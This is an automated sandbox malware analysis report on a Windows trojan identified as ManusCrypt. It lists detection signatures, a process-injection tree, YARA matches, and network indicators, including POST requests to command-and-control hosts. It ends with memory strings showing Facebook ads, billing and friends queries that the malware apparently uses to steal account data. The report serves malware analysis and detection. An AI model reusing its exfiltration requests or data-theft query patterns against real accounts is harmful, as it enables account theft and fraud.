Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:696397
MD5:2ef8da551cf5ab2ab6e3514321791eab
SHA1:d618d2d2b8f272f75f1e89cb2023ea6a694b7773
SHA256:50691a77e2b8153d8061bd35d9280c0e69175196cdcf876203ccecf8bcfd7c19
Tags:exe
Infos:

Detection

ManusCrypt
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected ManusCrypt
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Creates processes via WMI
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Installs new ROOT certificates
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Queries disk information (often used to detect virtual machines)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • file.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2EF8DA551CF5AB2AB6E3514321791EAB)
    • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 2792 cmdline: "C:\Users\user\Desktop\file.exe" -h MD5: 2EF8DA551CF5AB2AB6E3514321791EAB)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rundll32.exe (PID: 6084 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4528 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 4776 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • svchost.exe (PID: 5192 cmdline: C:\Windows\system32\svchost.exe -k WspService MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 5292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 368 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2112 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2372 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1148 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2564 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1080 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 4724 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1492 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1924 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1364 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3584 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1204 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2232 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
    0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmpWindows_Trojan_Generic_a681f24aunknownunknown
    • 0x576f0:$a: _kasssperskdy
    • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
    0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0xe2c0c:$xo1: "7$!!,bxc}
    0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
    • 0xaa:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
    Click to see the 233 entries
    SourceRuleDescriptionAuthorStrings
    37.0.svchost.exe.28291080000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
    • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
    37.0.svchost.exe.28291080000.0.unpackJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
      37.0.svchost.exe.28291080000.0.unpackMALWARE_Win_ChebkaDetects ChebkaditekSHen
      • 0x58c08:$s1: -k netsvcs
      • 0x583c8:$s3: Mozilla/4.0 (compatible)
      • 0x576f0:$s4: _kasssperskdy
      • 0x56d88:$s5: winssyslog
      • 0x58950:$s6: LoaderDll%d
      • 0x56c60:$s7: cmd.exe /c rundll32.exe shell32.dll,
      • 0x56890:$s8: cmd.exe /c start chrome.exe
      • 0x569f0:$s8: cmd.exe /c start msedge.exe
      • 0x56bd0:$s8: cmd.exe /c start firefox.exe
      • 0x66ef0:$f1: .?AVCHVncManager@@
      • 0x672d8:$f2: .?AVCNetstatManager@@
      • 0x67348:$f3: .?AVCTcpAgentListener@@
      • 0x671c8:$f4: .?AVIUdpClientListener@@
      • 0x67578:$f5: .?AVCShellManager@@
      • 0x67528:$f6: .?AVCScreenSpy@@
      37.0.svchost.exe.28291080000.0.unpackWindows_Trojan_Generic_a681f24aunknownunknown
      • 0x576f0:$a: _kasssperskdy
      • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
      37.2.svchost.exe.28291080000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
      • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
      Click to see the 296 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://v.xyzgamev.com/logo.pngAvira URL Cloud: Label: malware
      Source: https://v.xyzgamev.com/911.htmlAvira URL Cloud: Label: malware
      Source: http://35.236.159.79/win.pacAutoConfigURLSOFTWAREAvira URL Cloud: Label: malware
      Source: http://35.236.159.79/win.pacAvira URL Cloud: Label: malware
      Source: v.xyzgamev.comVirustotal: Detection: 11%Perma Link
      Source: https://v.xyzgamev.com/911.htmlVirustotal: Detection: 13%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\db.dllReversingLabs: Detection: 24%
      Source: 24.0.svchost.exe.2468b5b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 34.0.svchost.exe.1af63d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 26.0.svchost.exe.226f8d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 30.0.svchost.exe.21bd8470000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 29.2.svchost.exe.236f3940000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 35.0.svchost.exe.23e495b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 27.0.svchost.exe.195990b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 29.0.svchost.exe.236f3940000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 24.2.svchost.exe.2468b5b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 15.2.svchost.exe.1b37c560000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 41.0.svchost.exe.2b6680f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 30.2.svchost.exe.21bd8470000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 22.0.svchost.exe.1b6d6000000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 20.0.svchost.exe.1dbfc920000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 41.2.svchost.exe.2b6680f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 37.0.svchost.exe.28291080000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 37.2.svchost.exe.28291080000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 35.2.svchost.exe.23e495b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 10.2.rundll32.exe.4250000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 33.0.svchost.exe.1e554740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 13.2.svchost.exe.1a748340000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 21.0.svchost.exe.1f97f120000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 22.2.svchost.exe.1b6d6000000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 34.2.svchost.exe.1af63d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 20.2.svchost.exe.1dbfc920000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 26.2.svchost.exe.226f8d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 31.2.svchost.exe.1f1ed200000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 27.2.svchost.exe.195990b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 11.0.svchost.exe.22baf530000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 25.0.svchost.exe.25139800000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 33.2.svchost.exe.1e554740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 15.0.svchost.exe.1b37c560000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 21.2.svchost.exe.1f97f120000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 11.2.svchost.exe.22baf530000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 25.2.svchost.exe.25139800000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: 31.0.svchost.exe.1f1ed200000.0.unpackAvira: Label: TR/ATRAPS.Gen2
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49754 version: TLS 1.2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042645C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,10_2_042645C0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04254C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,10_2_04254C20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04254E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,10_2_04254E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042556D0 FindFirstFileW,FindClose,10_2_042556D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042557F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,10_2_042557F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04256A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,10_2_04256A40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042542B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,10_2_042542B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04289B29 FindFirstFileExA,10_2_04289B29
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042553D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,10_2_042553D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042673D0 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,10_2_042673D0

      Networking

      barindex
      Source: C:\Windows\System32\svchost.exeDomain query: g.agametog.com
      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
      Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
      Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 1590Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 250Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewIP Address: 104.21.34.132 104.21.34.132
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: svchost.exe, 0000000D.00000002.812594794.000001A749F50000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pac
      Source: svchost.exe, 0000000D.00000002.812594794.000001A749F50000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pacAutoConfigURLSOFTWARE
      Source: svchost.exe, 0000000D.00000002.802010893.000001A748098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.536203274.000001B37C287000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.306191814.000001B37C28A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.293476565.000001B37C2B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: svchost.exe, 0000000F.00000000.293150967.000001B37C213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.305697056.000001B37C213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.535579714.000001B37C213000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp.
      Source: svchost.exe, 00000016.00000000.318726025.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.321015591.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.798257881.000001B6D541F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/P
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///live.com
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///windows.net
      Source: svchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///xboxlive.com
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: svchost.exe, 00000023.00000003.588663723.0000023E488C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comd
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/2DF7
      Source: svchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net12DF7
      Source: svchost.exe, 00000023.00000002.798887868.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.397092463.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399702909.0000023E48858000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net2-1002
      Source: svchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.netory
      Source: svchost.exe, 0000000D.00000003.450892178.000001A74A3BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/
      Source: svchost.exe, 0000000D.00000002.801106382.000001A748074000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.814815021.000001A74A35A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.php
      Source: svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.php00
      Source: svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpH
      Source: svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpJ
      Source: svchost.exe, 0000000D.00000002.814815021.000001A74A35A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpa
      Source: svchost.exe, 0000000D.00000002.801106382.000001A748074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpy
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/accounts/edit/
      Source: svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399702909.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
      Source: svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com-969C-B95DBF145D3D.local
      Source: svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
      Source: unknownDNS traffic detected: queries for: v.xyzgamev.com
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0426F540 recv,recv,SetLastError,GetLastError,WSAGetLastError,10_2_0426F540
      Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
      Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "epsilon_checkpoint"https://www.facebook.com/ads/manager/account_settings/account_billing""ACCOUNT_ID":""USER_ID":""token":"async_get_token":"{"adAccountID":"{access_token:"{"sessionID":"account_currency_ratio_to_usd:https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag=@@https://www.facebook.com/friends/list"all_friends_data":{"count":https://www.facebook.com/friends"friends_container_request_count":{"count":av=&__user=&fb_dtsg=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubPageListCardQuery&variables=%7B%22assetOwnerId%22%3A%22%22%7D&doc_id=4988503034498154https://www.facebook.com/api/graphql/datauserDatapages_can_administerhttps://business.facebook.com/adsmanager/manage/accounts?act="adtrust_dsl":&business_id=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&doc_id=4075226092554060billable_account_by_payment_accountaccount_statusDISABLEDACTIVECLOSEDbalanceformattedbillable_account_tax_infobusiness_country_codecurrencystored_balance_statusprepay_account_balancebilling_threshold_currency_amountformatted_amountbilling_payment_accountbilling_payment_methodscredential__typenameExternalCreditCardPaymentPaypalBillingAgreementStoredBalanceExtendedCreditAdsToken&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubLandingPageQuery&doc_id=3953057938071449https://www.facebook.com/accountquality/?landing_page=insightsviewerad_accountsnodesadvertising_restriction_infoviewer_permissionsadminis_restrictedrestriction_daterestriction_typeaccount_userad_businessesbilling_txnsedgeshttps://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act=https://www.facebook.com/ads/manage/invoices_generator/&variables=%7B%22paymentAccountID%22%3A%22%22%2C%22count%22%3A10%2C%22cursor%22%3Anull%2C%22filters%22%3A%5B%5D%2C%22start_time%22%3A1281628800%2C%22end_time%22%3A1692929024%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingTransactionTableQuery&doc_id=5015578711817965https://www.facebook.com/ads/manager/billing_history/summary/&variables=%7B%22numOfGlobalScopesToLoad%22%3A500%2C%22businessPaginationCursor%22%3Anull%2C%22searchQuery%22%3A%22%22%2C%22assetTypeEnums%22%3A%5B%22AD_ACCOUNT%22%5D%2C%22numToLoad%22%3A50%2C%22localScopePaginationCursor%22%3Anull%2C%22bagIDs%22%3A%5B%22%22%5D%2C%22bypas